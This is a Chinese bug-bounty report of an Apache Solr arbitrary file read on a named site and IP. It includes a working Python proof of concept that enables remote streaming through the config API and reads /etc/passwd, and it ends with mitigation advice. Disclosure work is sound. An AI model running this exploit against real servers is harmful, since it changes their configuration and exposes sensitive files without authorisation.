厂商名称：
所属SRC：互联网空间-亿万守护计划
漏洞标题：xxx网站存在敏感文件泄露
漏洞类别：web
漏洞类型: 事件型
利用通用漏洞：是
组件名称：Apache Solr <= 8.8.1任意文件读取漏洞
漏洞等级：高危
漏洞url：http://tlele.cn:8983 http://www.tlele.cn:8983
网站名称：
网站ip：106.13.108.117
所属地区：
漏洞描述：Apache Solr存在任意文件读取,漏洞攻击者可以在未授权的情况下获取目标服务器敏感文件
复现步骤：
# -*- coding: utf-8 -*-
import requests

host = "http://http://106.13.108.117:8983"
if host[-1] == '/':
    host = host[:-1]


def poc(host):
    url = host + '/solr/admin/cores?indexInfo=false&wt=json'
    core_data = requests.get(url, timeout=3).json()
    if core_data['status']:
        core = list(core_data['status'].keys())[0]
        jsonp_data = {"set-property": {"requestDispatcher.requestParsers.enableRemoteStreaming": 'true'}}
        requests.post(url=host + "/solr/%s/config" % core, json=jsonp_data)

        result_data = requests.post(url=host + '/solr/%s/debug/dump?param=ContentStreams' % core,
                                    data={"stream.url": "file:///etc/passwd"}).json()
        if result_data['streams']:
            print(result_data['streams'][0]['stream'])
    else:
        exit("不存在此漏洞")


poc(host)
修复方案：由于官方拒绝修复该漏洞，因此请将Apache solr在内网中启动，若需要在公网中使用，需要限制访问ip 